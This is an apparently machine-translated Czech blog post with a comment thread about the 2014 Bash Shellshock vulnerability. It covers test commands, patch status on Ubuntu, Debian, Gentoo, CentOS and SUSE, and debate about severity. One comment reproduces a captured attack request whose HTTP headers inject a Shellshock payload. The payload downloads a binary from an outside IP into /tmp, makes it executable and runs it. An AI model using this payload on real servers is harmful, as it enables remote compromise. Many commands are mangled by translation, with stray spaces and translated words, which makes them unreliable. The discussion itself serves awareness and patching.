Na některých blogech to běží jako blesk, příběh publikovaný v bezpečnostní blog de Red Hat o zranitelnosti nalezené v Bash kvůli zneužití globálních proměnných. Podle původních zpráv:
„... Tato chyba zabezpečení je způsobena skutečností, že proměnné prostředí se speciálně vytvořenými hodnotami lze vytvořit před voláním prostředí bash. Tyto proměnné mohou obsahovat kód, který se provede, jakmile se vyvolá prostředí. Na názvu těchto zpracovaných proměnných nezáleží, pouze na jejich obsahu. Výsledkem je, že tato chyba zabezpečení je odhalena v mnoha kontextech, například:
- ForceCommand používá se v konfiguracích sshd k zajištění omezených možností provádění příkazů pro vzdálené uživatele. Tuto chybu lze použít, abyste se tomu vyhnuli a zajistili libovolné provedení příkazu. Některé implementace Git a Subversion používají takové omezené mušle. Pravidelné používání OpenSSH není ovlivněno, protože uživatelé již mají přístup ke konzole.
- Server Apache využívající mod_cgi nebo mod_cgid jsou ovlivněny, pokud jsou skripty CGI psány v bash nebo v podúrovních. Takové podúrovně implicitně používá systém / popen v jazyce C, os.system / os.popen v Pythonu, pokud používá prostředí system / exec v PHP (při spuštění v režimu CGI) a open / system v Perlu (což závisí na řetězci příkazu).
- Skripty PHP spuštěné s mod_php nejsou ovlivněny, i když jsou přehrávány podúrovně.
- Klienti DHCP vyvolávají skripty prostředí ke konfiguraci systému s hodnotami převzatými z potenciálně škodlivého serveru. To by umožnilo vykonávat libovolné příkazy, obvykle jako root, na klientském počítači DHCP.
- Různé démony a programy s oprávněními SUID mohou spouštět skripty prostředí s hodnotami proměnných prostředí nastavenými / ovlivňovanými uživatelem, což by umožňovalo provádění libovolných příkazů.
- Jakákoli jiná aplikace, která se připojuje k shellu nebo spouští skript prostředí, jako je použití bash jako tlumočníka. Shell skripty, které neexportují proměnné, nejsou vůči tomuto problému zranitelné, i když zpracovávají nedůvěryhodný obsah a ukládají jej do proměnné prostředí (vlevo) a podúrovně otevřené.
... “
Jak zjistit, zda je ovlivněn můj bash?
Vzhledem k tomu existuje velmi jednoduchý způsob, jak zjistit, zda se nás tato chyba zabezpečení týká. Ve skutečnosti jsem testoval na svých Antergos a zjevně nemám problém. Musíme otevřít terminál a dát:
env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test"
Pokud to vyjde tímto způsobem, nemáme žádný problém:
env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test" bash: varování: x: ignorování definice funkce pokus bash: chyba při importu definice funkce pro `x' toto je test
Pokud je výsledek jiný, možná budete chtít použít aktualizační kanály našich preferovaných distribucí, abyste zjistili, zda již opravu použili. Takže víš 😉
Aktualizováno: Toto je výstup od spolupracovníka používajícího Ubuntu 14:04:
env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test" zranitelný toto je test
Jak vidíte, zatím je zranitelná.
Mám Kubuntu 14.04 z 64 a také dostanu:
env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test"
zranitelný
tohle je zkouška
Již jsem aktualizoval, ale neopravuje se. Co dělat?
Počkejte, až se aktualizují. Již je například aktualizován eOS .. 😀
Jak divné, mám také Kubuntu 14.04
$ env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test"
bash: varování: x: ignorování pokusu o definici funkce
bash: chyba při importu definice funkce pro `x '
tohle je zkouška
Dodávám, že verze balíčku „bash“, která byla dnes stažena, je:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
V mém případě dává příkaz, v terminálu mi dává pouze následující:
>Vtip je v tom, že jsem aktualizoval Debian Wheezy a to mě vyhodilo.
Wheezy je stále zranitelný vůči druhé části chyby, přinejmenším na odpoledne (UTC -4: 30) byl problém stále následující: /
Právě jsem ověřil, že po použití aktualizace dnes ráno nejsou ovlivněny ani Slackware, ani Debian, ani Centos, protože obdrželi odpovídající aktualizaci.
Co dělá Ubuntu v tuto hodinu stále zranitelným? A řekni mi, že je to bezpečné: D.
Ale zkusili jste aktualizovat Ubuntu?
S dnešní aktualizací to také opravili.
OK
Bezpečnostní experti varují před zranitelností „Bash“, pro uživatele softwaru Linux by to mohlo představovat větší hrozbu než chyba Heartbleed, kde mohou hackeři zneužít chybu v Bash, aby získali úplnou kontrolu nad systémem.
Tod Beardsley, technický manažer v kybernetické bezpečnostní firmě Rapid7, varoval, že chyba byla hodnocena 10 kvůli její závažnosti, což znamená, že má maximální dopad, a hodnocena jako „nízká“ kvůli složitosti zneužití, což je relativně snadné pro „hackerské“ útoky . Pomocí této chyby zabezpečení mohou útočníci potenciálně převzít kontrolu nad operačním systémem, přistupovat k důvěrným informacím, provádět změny atd., “Uvedl Beardsley. „Každý, kdo má systémy, které obsadí Bash, by měl opravu okamžitě použít,“ dodal.
PŘED TUTO ZRANITELNOSTÍ, KTERÁ PŘEDSTAVUJE STARÝ NÁSTROJ (GNU), kde je hostován Bach, by pro Linux Software bylo výhodnější zbavit se GNU a změnit nástroj BSD.
PS: NECENUJTE moji svobodu projevu, ... nikoho neurážejte, ... neodstraňujte moji zprávu jako předchozí zpráva, kterou jsem odstranil!
Prosím, nepřehánějte to. Jak nenávidím ty lidi, kteří používají BSD a pohrdají GNU, Linuxem nebo čímkoli, co pochází z těchto projektů.
Jsem s vámi a máte naprostou pravdu, pokud jde o závažnost této díry.
Nebyla to cenzura, byla to nadbytečnost (stejný příspěvek jste učinili v příspěvku gnome 3.14)
«… A hodnoceno jako„ NÍZKÉ “PRO KOMPLEXNOST vykořisťování, což znamená, že je relativně SNADNÉ pro hackerské útoky»
Je patrná nesrovnalost?
Jak může být snadné tuto zranitelnost zneužít a zároveň mít „nízkou“ úroveň rizika, protože je tak složité ji používat?
Jedná se o chybu, která byla vyřešena během několika hodin po vzájemném poznání a která, stejně jako srdce, nemá žádné zprávy o tom, že by byla zneužita (Samozřejmě, že to má méně času se navzájem poznat).
Je to spíše bulvární tisk než skutečné riziko.
Zdá se vám @Staff nedůležitý? Co mi teď řekneš?
ZÍSKAT/.HTTP/1.0
.User-Agent: .Thanks-Rob
.Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .mod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .mod.777. / tmp / besh; ./ tmp / besh;
.Referer: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .mod.777. / tmp / besh; ./ tmp / besh;
.Akceptovat:. * / *
$ soubor nginx
nginx: ELF 32bitový LSB spustitelný, Intel 80386, verze 1 (SYSV), staticky propojený, pro GNU / Linux 2.6.18, odizolovaný
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Víš co to je? Nic nebezpečného ...
Situace je docela vážná, ale odtamtud říci, že byste měli přestat používat bash pro možnost BSD, je to už tolik, aktualizace již existuje, jen se dotknu aktualizace a nic jiného.
Nyní PD, myslím, že je to spíše kolega @robet, nemyslím si, že zde jsou administrátoři odhodláni mazat takové komentáře, protože ano, protože, protože jsem se účastnil této komunity, měl jsem ten pocit a doufám, že tak zůstane.
Zdravím.
Stejný komentář jste vložili do dvou různých příspěvků. Pokud se snažíte propagovat „zdroj“ příběhu, omlouvám se, toto není místo.
Bash pochází z Unixu (a jeho klonu GNU). Ovlivněny jsou také systémy založené na BSD, jako je OSX, a podle Genbety to zatím neopravili. Podobně pro přístup k Bash potřebujete uživatelský účet, buď lokální, nebo přes SSH.
@Personál:
1. - Je klasifikován jako úroveň 10 (maximální úroveň nebezpečí) kvůli množství služeb, které mohou být chybou ovlivněny. V hlavní poznámce tuto skutečnost velmi jasně uvádějí a tvrdí, že chyba může ovlivnit služby, jako je apache, sshd, programy s oprávněním suid (mimo jiné xorg).
2.- Je klasifikován jako nízký stupeň obtížnosti, pokud jde o jeho implementaci, a nejlepším příkladem toho je testovací test zranitelnosti, který @elav umístil do příspěvku. Jak je vidět, implementace není velmi obtížná.
Nevidím nadbytečnost v informacích (vidím pouze překlad Google) a pokud je problém docela vážný, a jak říkáte, již má opravu a řešení, ale ne za to, už to není riziko, a docela skutečný.
@petercheco / @Yukiteru
Nevykládejte mě špatně, myslím, že je jasné, že mojí kritikou jsou zprávy, které Robet propojuje a je zaměřena na nesoulad a ne na nadbytečnost.
Stejným způsobem musíme rozlišovat mezi rizikem a nebezpečím (to nezmiňuji), běžně je používáme jako synonyma, ale zde by nebezpečím byla škodová kapacita ploštice a riziko pravděpodobnosti jejího výskytu.
V mém konkrétním případě jsem vstoupil ze včerejška. Nebylo to pro seznamy adresátů ani nic podobného. Bylo to pro distribuci na ploše! Zvedl jsem telefon a poslal zprávu sysadminovi s odkazem a potvrdil jsem, že mám všechno opravené, pak mě omluvte, ale tyto zprávy mi nedávají spát.
Na jiných fórech se zmiňují o zranitelnosti Bash, „řešení, které vydali Debian a Ubuntu“, ale dnes zjistili, že zranitelnost stále existuje, takže řešení bylo neúplné, to je to, co zmiňují!
Vidím, že mnoho lidí mi vyčítalo prostý fakt, že jsem lidem zabránil v závažnosti zranitelnosti - kvalifikované s úrovní 10 maximální nebezpečnosti, a zmínil možná řešení pro Linux Software tváří v tvář zastaralému GNU nástroji, kde je hostován Bash - který dokonale GNU lze nahradit nástrojem BSD v Linux Software,… Používám také Linux a mám rád Linux!
Upřesňuji, že Bash není standardně nainstalován v BSD, je to ještě jeden balíček kompatibility s Linuxem, který lze nainstalovat do BSD ... ano! A zdroj je uveden tak, aby mohli kontrolovat zprávy, protože mnoho uživatelů někdy zprávě nebo komentáři nevěří.
robet: Jak vám už řekli znovu a znovu, svůj komentář se zprávami jste již vložili do příspěvku, nemusíte jej vkládat do každého příspěvku, který komentujete.
O bash, protože existují i jiné granáty, které lze použít v případě, že je Bash zranitelný. 😉
Robete, o kterém vím, neexistuje žádný software, který by kombinoval linuxové jádro s BSD uživatelskou zemí. Nejbližší věc je naopak, kBSD + GNU, jako to dělají Gentoo a Debian. Kromě toho nelze GNU (1983) nazvat „staromódním“, pokud je to po BSD (1977). Oba sdílejí svůj unixový root (ale ne kód), neexistovala by žádná „Linuxová kompatibilita“, kdyby byl Bash vytvořen, když byl Linus T ještě dítě.
uff, testování v Debianu je v tuto chvíli „zranitelné“, jaké máme ...
Používám Debian Testing a dokonce i v této větvi jsme obdrželi aktualizaci bash
podle genbety existuje i další zranitelnost
http://seclists.org/oss-sec/2014/q3/685
příkaz k dotazu je
env X = '() {(a) => \' sh -c "echo zranitelný"; bash -c "Chyba ozvěny 2 neopravená"
env X = '() {(a) => \' sh -c "echo zranitelný"; bash -c "echo Unpatched Failure 2" sh: X: řádek 1: syntaktická chyba poblíž neočekávaného prvku `= 'sh: X: řádek 1:' 'sh: chyba při importu definice funkce pro` X' sh: zranitelný: příkaz nebyl nalezen Selhání 2 bez opravystejný já.
Totéž zde. Ale původní chyba v příspěvku byla opravena v (L) Ubuntu 14.04
Místo toho, abych provedl jednoduchou ozvěnu, zkuste to provést instrukci, která vyžaduje oprávnění, hodím „nedostatečná oprávnění“ ... tato chyba nezvyšuje oprávnění? Pokud nezvyšuje oprávnění, pak to není tak nebezpečné, jak to vykreslují.
Máš pravdu!! byli to dvě zranitelnosti ...
Pro mě v Linux Mint 17 po druhé aktualizaci bash, kterou včera vložili do repozitářů Ubuntu, po provedení tohoto příkazu shell nabízí tento výstup:
env X = '() {(a) => \' sh -c "echo zranitelný"; bash -c "echo Fail 2 unatched"
>
Verze „bassh“, která byla vložena do repozitářů Ubuntu za účelem aktualizace předchozích, je:
4.3-7ubuntu1.2
V systémech odvozených od Debianu můžete zkontrolovat nainstalovanou verzi pomocí tohoto příkazu:
dpkg -s bash | grep Verze
V každém případě by mělo být vyjasněno, alespoň pro uživatele Debianu, Ubuntu a Mint; Neměli byste se příliš zajímat o programy, které spouštějí skripty s hlavičkou #! / Bin / sh, protože na těchto distribucích / bin / sh nevolá „bash“, ale váže se na shell „dash“ (dash je :)
Konzole Debian Alchemist (dash) je odvozená konzole POSIX
popela.
.
Protože spouští skripty rychleji než bash a má méně závislostí
knihovny (čímž je odolnější proti selhání softwaru nebo
hardware), používá se jako výchozí systémová konzola v systémech
Debian.
Alespoň v Ubuntu se tedy „bash“ používá jako shell pro přihlášení uživatele (také pro uživatele root). Každý uživatel však může ve výchozím nastavení použít jiný shell pro uživatele a kořenové konzoly (terminály).
Je snadné zkontrolovat, že shell spouští skripty (#! / Bin / sh) provedením těchto příkazů:
file / bin / sh
(výstup je / bin / sh: symbolický odkaz na `dash ') následujeme stopu opakující příkaz
file / bin / dash
(výstup je / bin / dash: ELF 64bitový sdílený objekt LSB, x86-64, verze 1 (SYSV), takže se jedná o spustitelný soubor.
Toto jsou výsledky distribuce Linux Mint 17. V ostatních distribucích, které nejsou založeny na Ubuntu / Debian, se mohou lišit.
Není těžké změnit výchozí shell !! můžete dokonce použít jiný pro uživatele a pro uživatele root. Ve skutečnosti musíte nainstalovat preferovaný shell a změnit výchozí pomocí příkazu "chsh" nebo úpravou souboru / etc / passwd (ačkoli uživatelé, kteří neznají důsledky chyby při úpravách souboru "passwd", je lepší se velmi dobře informovat a před jeho editací si vytvořte kopii originálu pro případ, že je nutné jej obnovit).
S "tcsh" se cítím pohodlněji (tcsh je :)
Konzole TENEX C, vylepšená verze Berkeley csh
„Csh“ používá systém Mac OS X před několika lety. Vzhledem k tomu, že velkou část operačního systému Apple tvoří kód FreeBSD, je to něco logického. Z toho, co jsem četl včera, se zdá, že také poskytují „bash“ pro uživatelské terminály.
ZÁVĚRY:
- Opravy „bash“ verzí „pro nejpoužívanější distribuce“ již byly distribuovány
- Verze „bash“ 4.3-7ubuntu1.2 a novější tyto chyby neobsahuje
- Používání "bash" v OS * Linux není povinné
- Několik * linuxových distribucí odkaz #! / Bin / sh s "bash"
- Existují alternativy: ash, dash, csh, tcsh a některé další
- Není komplikované měnit výchozí shell, který systém volá při otevírání terminálu
- Několik malých zařízení (směrovače a další) používá „bash“, protože je velmi velký !!
Právě teď dorazila další aktualizace, která nainstaluje další verzi „bash“ 4.3-7ubuntu1.3
Pro Linux Mint 17 a Ubuntu 14.04.1 LTS
ArchLinux vstoupil do verze bash-4.3.026-1
@ Xurxo ... .csh od Berkeley?, ... Rozumíte něčemu, co mluvím výše, a je lepší použít BSD „csh“ ... než starý GNU nástroj, kde je hostován Bash. Tento nástroj je nejlepší pro software Linux.
Myslím, že to je chyba
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
skutečný?
A jaké by bylo řešení?
Počkejte, až aktualizují balíček na vaší distribuci 😉
Ploštice byla pokřtěna jako střela
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
zranitelný
tohle je zkouška
Pro Ubuntu Studio 14.04 zatím žádná oprava
Opraveno v Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test"
bash: varování: x: ignorování pokusu o definici funkce
bash: chyba při importu definice funkce pro `x '
tohle je zkouška
Ve skutečnosti se jedná o malou zranitelnost, pokud se vás týká, je to, že jste předtím dělali něco špatně ...
Protože bash skript, který běží s oprávněním root, by nikdy neměl být uživateli vystaven. A pokud běží bez privilegií, není tu žádná taková bulnerabilita. Vlastně je to nesmysl. Hodně děsivé.
Myslím si to samé.
Přesně tak, k prodeji více novin nebo k většímu počtu návštěv jsou tyto chyby dobré.
Vždy ale zapomenou zmínit, že aby bylo možné kompromitovat počítač pomocí těchto druhů skriptů, musíte mít nejprve přístup k bash a poté jej mít jako root.
zaměstnanci, pokud používáte apache s cgi, jednoduše vložte záhlaví http jako cookies nebo doporučte funkci, kterou chcete spustit. Používá se dokonce k šíření červů.
a pokud někdo umístí shell na server s wget mishell.php, v takovém případě to není vážné, že?
Souhlasím s Vámi. Myslel jsem, že je to obrovská chyba jako ta v Heartbleed (dokonce i NSA si půjčila, aby podpořila nemocnost), ale koneckonců to byla drobná chyba.
Existují další opravdu závažné chyby, jako je šílená spotřeba Flash a pokles výkonu v Pepper Flash Player, a ten, který již byl opraven chyba webRTC v Chrome a Firefoxu.
Víte, jestli má dohodu pro lidi, kteří mají Linux Mint 16?
V testování Debianu to už bylo opraveno.
V mých 5 distribucích je to vyřešeno, v mém OS X nevím.
Prosím, necenzurujte můj komentář, řekl jsem OS X. Nevím, jestli můžete říci OS X na tomto webu.
@yoyo dobře to moc nedělejte, že stále pracují na některých detailech patche ... zkuste to a pak mi řekněte, jak XD
env x = '() {:;}; echo zranitelný 'bash -c "echo Jsem zranitelnější než koš iPhonu 6"
Že pokud to vyřešili 100% před OS X, vsadím cokoli
I v Ars Technica dávají Bash v OSX význam.
@Yoyo další komentář k OS X pro SPAM .. lla tu save .. 😛
@yoyo tam opravit nabídky ... ale zbytek víte 😉
FSF promluvil
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Jako by se stali patronáty s OSX (protože OSX stále používá Bash: v).
Každopádně se s Debianem Jessie tolik nemusím bát.
Pokud je systém v Cent OS zranitelný:
yum clean all && yum update bash
zobrazit verzi bash:
otáčky -qa | grep bash
Pokud je verze starší než bash-4.1.2-15.el6_5.1, může být váš systém zranitelný!
Zdravím.
2. chyba zabezpečení dosud nevyřešena
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "Chyba ozvěny 2 bez opravy"
Aktualizace ...
V Gentoo se mi stane opak, jsem zranitelný pouze při prvním neúspěchu, ale u druhého dostanu toto:
[code] sh: X: řádek 1: syntaktická chyba poblíž neočekávaného prvku `= '
sh: X: řádek 1: ''
sh: Chyba při importu definice funkce pro `X '
sh: zranitelný: příkaz nebyl nalezen
Chyba 2 není opravena
[/ Code]
Nevím, jestli už bude existovat stabilní verze Bash s opravenými chybami, ale v každém případě to bude čekající na příště udělám emerge –sync && emerge –update –deep –with-bdeps = a - newuse @world (takhle krok aktualizuji celý systém).
Mám Gentoo s verzí 4.2_p50 a zatím prošel všemi testy. Zkuste vytvořit –sync a poté se objeví -av1 app-shells / bash a poté pomocí příkazu bash –version zkontrolujte verzi 4.2_p50.
Zkusili jste to?
A s novými balíčky přináší nový test Red Hat
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "datum ozvěny"; kočka / tmp / echo
pokud náš systém není zranitelný a byl správně opraven, musí nám něco takového dát
Datum 1
2 cat: / tmp / echo: Soubor nebo adresář neexistuje
Zkuste to takto:
env X = '() {(a) => \' sh -c "echo zranitelný"; bash -c "oprava selhání echa 2"
dostanu
zranitelný
Chyba 2 opravena.
Zapomeňte na to, řádek je špatně naformátovaný.
Výborně! Aktualizaci jsem již provedl na mém Slackware, díky!
Ahoj, mám otázku, mám několik serverů s 10bitovým „SUSE Linux Enterprise Server 64“.
Když provádím příkazy, které jsem zranitelný, jsem ještě zranitelnější než koš iPhone 6 xD
Pokud se nemýlím s aktualizací / instalací balíčků v SUSE, provádí se to příkazem «zypper».
Na některých serverech mi to říká toto:
BIAL: ~ # zypper nahoru
-bash: zypper: příkaz nebyl nalezen
BIAL: ~ #
A v ostatních toto:
SMB: ~ # zypper nahoru
Obnovování systémových zdrojů ...
Analýza metadat pro SUSE Linux Enterprise Server 10 SP2-20100319-161944…
Analýza databáze RPM ...
Shrnutí:
Není co dělat.
Co dělám?
Vím, že někteří říkají, že zranitelnost je menší než to, co namalují, ale já ji mám a nechci být vystaven riziku, ať už je to malé nebo velké.
Zdravím.
Dobrou noc, zkusil jsem vložit kód, který jste uvedli v článku, chápu to
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo zranitelný 'bash -c "echo toto je test"
tohle je zkouška
sanders @ pc-sanders: ~ $
Můžete mi prosím vysvětlit, jak opravit distro, aktualizuji každý den a nevidím změny ve výstupu výzvy.
Děkuji moc!